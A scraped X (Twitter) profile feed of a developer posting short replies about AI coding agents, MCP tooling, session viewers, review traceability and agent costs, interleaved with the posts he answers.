Isaac

460 posts

Isaac

@Dever401

Building things from scratch | AI tools & dev infra | Always shipping Portfolio:- https://t.co/fASmWbJhCl

localhost Katılım Temmuz 2025

31 Takip Edilen50 Takipçiler

Isaac@Dever401·21h

AI interviews are so difficult 😭😂 You study algorithms, system design, product sense, debugging, and prompt strategy... then one question still makes your brain open 17 tabs at once.

English

Isaac@Dever401·22h

@hadd49590 @nghoihin Typed graph context feels much more durable than dumping chat history into a prompt. The hard product problem is versioning the schema as team language changes without making every agent integration brittle.

English

Ismail@hadd49590·22h

@nghoihin Typed graph over team chat is a smart primitive. Most MCP tools treat context as a blob to inject; a typed graph lets agents reason about relationships rather than retrieving flat text. How do you handle schema drift as conversation patterns change?

English

Ismail@hadd49590·23h

Two protocols will define how AI agents communicate: MCP (Anthropic): agents use TOOLS. One schema, any model. A2A (Google): agents coordinate with AGENTS. Discover, delegate, get results. They compose. This is the infrastructure layer the agentic era needed.

English

Isaac@Dever401·22h

@imog @HackingDave This is the part teams will have to operationalize: model routing by task type, MCP/API cost visibility, and a hard split between planning, execution, and verification. Otherwise agent workflows quietly become a huge bill.

English

imog@imog·22h

@HackingDave Gpt5.5 is expensive for ITOps work. I've completely transitioned to managing our estate via MCP/API, and on a teams plan ccusage pins me at $100-200/day, and im mitigating by using sonnet for execution and opus for planning. Moving to API... They arent ready for $100-200/day.

English

Dave Kennedy@HackingDave·23h

This is surprising to me, first - GPT 5.5 is a better model than Opus 4.7, and second - the granular enterprise controls you get in OpenAI is way better than the virtually non-existent administrative controls over at Anthropic.

Andrew Curran@AndrewCurran_

According to the new data from Ramp, Anthropic has passed OpenAI in business adoption for the first time. 'Adoption of Anthropic rose 3.8% in April to 34.4% of businesses. OpenAl adoption fell 2.9% to 32.3%. Overall Al adoption rose 0.2 percentage points to 50.6%.'

English

12K

Isaac@Dever401·22h

@narghev @DanielSmidstrup Attaching the diff viewer to the same session that made the change is smart. The review question is rarely just ?what changed?? It is ?why did the agent think this change solved the task??

English

narghev@narghev·4d

Sometimes.. and I am currently working on a tool that helps with the times that I want/have to. Its still WIP but would love more eyes on it. It opens up a diff viewer attached to the same Claude session that wrote the code, to remove the step of copy pasting diff back to the session. github.com/narghev/askdiff

English

Daniel Smidstrup@DanielSmidstrup·4d

Are you checking every line of code written by AI?

English

338

223

23.5K

Isaac@Dever401·22h

@gman_ai Less pretty, more useful is the right trade here. For debugging agent work, a pipeline trace beats chat bubbles because it shows sequence, tool boundaries, and where the state actually changed.

English

GMAN@gman_ai·3d

2570fda: swapped out session viewer chat-bubbles for pipeline trace in GMAN UI. Less pretty, more useful. Debugging should be easier now.

English

Isaac@Dever401·22h

@dhruv___anand This is the missing layer for multi-agent coding. Once sessions run across Codex, Claude Code, Cursor, and friends, the review surface matters as much as the agent: search, diffs, thinking blocks, and sub-agent trace all in one place.

English

Dhruv Anand@dhruv___anand·2d

Built a unified viewer for all your AI coding sessions — Claude Code, Cursor, Codex, OpenCode, Hermes, and more in one UI. Live updates · thread search · thinking blocks · sub-agents · Pretty mode with diff cards ▎npx agent-session-viewer github.com/dhruv-anand-ai… Try it out!

English

Isaac@Dever401·22h

AI coding agents do not need more mystery. They need receipts. Every useful run should leave: - goal - files changed - checks run - open risks - why the next human should trust it The future is not just better code generation. It is reviewable delegation.

English

Isaac@Dever401·22h

@princedoesai This is the right security direction. Once agents can pull packages, call MCP tools, and edit repos, the governance layer has to sit in the workflow itself, not as a PDF policy downstream.

English

Prince does AI@princedoesai·22h

🚨 Breaking News Endor Labs launched AURI Agent Governance and Package Firewall on May 12 to secure AI coding agents and workstations. The detail: Agent Governance monitors agents, models and MCP tools, while Package Firewall blocks risky packages before they reach agent workflows. Better move: Treat coding agents like privileged dev environments. Watch shell commands. Test .env access. Compare MCP usage. Save audit trails. Block fresh suspect packages. Ignore agent speed without controls. The bigger pattern: AI coding is becoming infrastructure. Security has to move into the agent run, not after the PR. endorlabs.com/learn/introduc…

English

Isaac@Dever401·22h

@Ebasrai22 @Lovable Voice plus MCP is powerful when the tool boundary is clear. The best flow is usually: say the intent, let the agent touch the right system, then inspect a small diff or preview before anything gets too real.

English

Ebrahim@Ebasrai22·22h

/voice plus @Lovable MCP on Claude code might be the best thing ever

English

Isaac@Dever401·22h

@andyhennie @adamsilverman This feels like the quiet version of agentic software that will actually stick: small local jobs, skills written around real pain points, and enough visibility that you can trust the automation without babysitting it.

English

Hennie@andyhennie·22h

@adamsilverman All Hermes cron jobs running on my main machine, running skills written by codex, after I voice prompted my pain points.

English

132

Adam Silverman (Hiring!) 🖇️@adamsilverman·1d

Anyone have a mac mini that is running 24/7 doing something productive? Everyone I talk to has bought one and it is only used a few minutes a day when they ask basic questions to it.

English

13.1K

Isaac@Dever401·22h

@jig_corp Appreciate it. Traceability is the part that turns AI work from a clever demo into something a team can actually operate: inputs, decisions, diffs, tests, and handoff notes all in one trail.

English

Jignesh@jig_corp·23h

@Dever401 I love this focus making AI workflows transparent and traceable is a game changer. Every step gets clearer, and shipping

English

Jignesh@jig_corp·1d

Hey founders and devs on X! Looking to connect with people building in: 🍽️ SaaS 🚀 Tech 📲 Automation 🧠 AI tools 📱 Product Development 🔥 Web APP 💻 Devs Drop what you're working on!!

English

1.3K

Isaac@Dever401·22h

@Stephansmith456 Exactly. Build in public works when the receipts are visible: what shipped, what broke, what changed your mind, and what the next smallest bet is. Polished certainty is less useful than honest momentum.

English

Stephane Tchoko@Stephansmith456·23h

@Dever401 Exactly. People trust momentum more than perfection. The more transparent you are about: what worked, what failed, what you learned, and what you’re shipping next, the more real the journey feels. That’s what actually makes Build in Public powerful.

English

Stephane Tchoko@Stephansmith456·2d

I failed 3 times trying to figure out Build in Public. The lesson? Stop overcomplicating. Keep it simple. Keep shipping.

English

Isaac@Dever401·22h

@aniongithub Yes. The review layer needs deterministic anchors: test results, coverage deltas, lint/type status, repro steps, and changed-file risk. More prompting helps, but metrics are what keep the review from becoming vibes.

English

aniongithub@aniongithub·23h

@Dever401 Totally agree! And in my experience, a large part of keeping review quality stable is to have objective, reproducible metrics as part of the review, not just more AI prompting (as this is inherently stochastic) 🙌

English

Isaac@Dever401·1d

Most AI coding demos are lying by omission. The hard part is not writing code. It is keeping context, tool state, and review quality stable across a long session. That is where agent workflows actually win or fail.

English

Isaac@Dever401·23h

The interesting test for Devin, Codex, and Claude Code is not just can it code. It is whether it can preserve project state, surface uncertainty, and hand back work a human can verify quickly.

English

Isaac@Dever401·1d

@bettercallsalva @OpenAI Yes. The model gets the headline, but the durable work is the harness: permissions, evals, rollback, audit trails, and enough observability that a team can trust the output under pressure.

English

Thiago Salvador@bettercallsalva·1d

@Dever401 @OpenAI The org-ops shift is the real story. Models are commodity-ish now, the moat is permission scaffolding + audit trails. Every enterprise win I see has someone full-time building eval + rollback infra. Folks shipping models look small next to the folks shipping the harness.

English

OpenAI@OpenAI·3d

Today we’re launching the OpenAI Deployment Company to help businesses build and deploy AI. It's majority-owned and controlled by OpenAI. It brings together 19 leading investment firms, consultancies, and system integrators to help organizations deploy frontier AI to production for business impact. openai.com/index/openai-l…

English

667

1.5K

11.4K

7.8M

Isaac@Dever401·1d

@adriwtm @OpenAI It is strongest when each tab has a narrow job and the handoff names what changed. It still gets messy if the sessions invent their own theories, so I try to force them back to evidence and repro steps.

English

adri@adriwtm·1d

@Dever401 @OpenAI Totally. Work coordinator is the right framing. How's it doing with parallel tabs on a messy debugging session?

English

adri@adriwtm·2d

@OpenAI says Codex now works directly in Chrome and runs in parallel across tabs. That is the real shift. AI coding tools are becoming workflow tools, not just code assistants. x.com/OpenAI/status/…

OpenAI@OpenAI

Codex now works directly in Chrome on macOS and Windows. It’s even better at working with apps and sites in Chrome, and now works in parallel across tabs in the background without taking over your browser. To get started, install the Chrome plugin in the Codex app.

English

Isaac@Dever401·1d

@SuperFunicular @claudeai Exactly. The hard part is not generating another patch; it is knowing which session still has the latest mental model. I would love tools to make lineage and confidence obvious at a glance.

English

Super Funicular LLC@SuperFunicular·1d

@Dever401 @claudeai The 'which thread is safe to resume' hits hardest. One Camera2 fix branching to three sessions — the tax wasn't writing code, it was tracking which session held the latest mental model. App I shipped this way: play.google.com/store/apps/det…

English

Claude@claudeai·2d

New in Claude Code: agent view. One list of all your sessions, available today as a research preview.

English

985

2.2K

28.8K

5.7M

Isaac@Dever401·1d

@liuzhengyanshuo @FahimTajwar10 @askalphaxiv That is a great way to frame it. A handoff should preserve the original question, the evidence trail, and the reason each constraint mattered; otherwise the next model optimizes for a slightly different problem.

English

Sean Liu@liuzhengyanshuo·1d

@Dever401 @FahimTajwar10 @askalphaxiv the hidden cost is losing the question shape during the switch. once the query gets rephrased a few times, the evidence trail starts drifting.

English

Fahim Tajwar@FahimTajwar10·2d

Please check out this super cool work from @askalphaxiv ! I really enjoyed reading the detailed blog, hope to see more cool things from them.

alphaXiv@askalphaxiv

Reinforcing Recursive Language Models Can a 4B model learn to recursively call itself to answer hard long-context questions? We RL fine-tuned a small model to behave as a native RLM. On evidence selection across scientific papers, our 4B RLM matches Sonnet 4.6 in quality while running significantly faster and cheaper.

English

1.8K

Isaac@Dever401·1d

@notmissing_ Fair critique, and I appreciate the directness. The goal is useful, specific replies that still sound like someone actually read the post. When it misses that, it is worth calling out.

English

NotMissing@notmissing_·1d

@Dever401 I mean that it was an AI generated reply, think you could work on make it sound more human No hate, just giving my pov

English

NotMissing@notmissing_·1d

Operators reading the claude vs codex debate: this isn't your decision to make What matters is that the AI in your business uses whichever model fits each task swaps when something better comes out and never locks you into one provider's pricing or rate limits

English

191

Keşfet

@hadd49590 @nghoihin @imog @HackingDave @narghev @DanielSmidstrup @gman_ai @dhruv___anand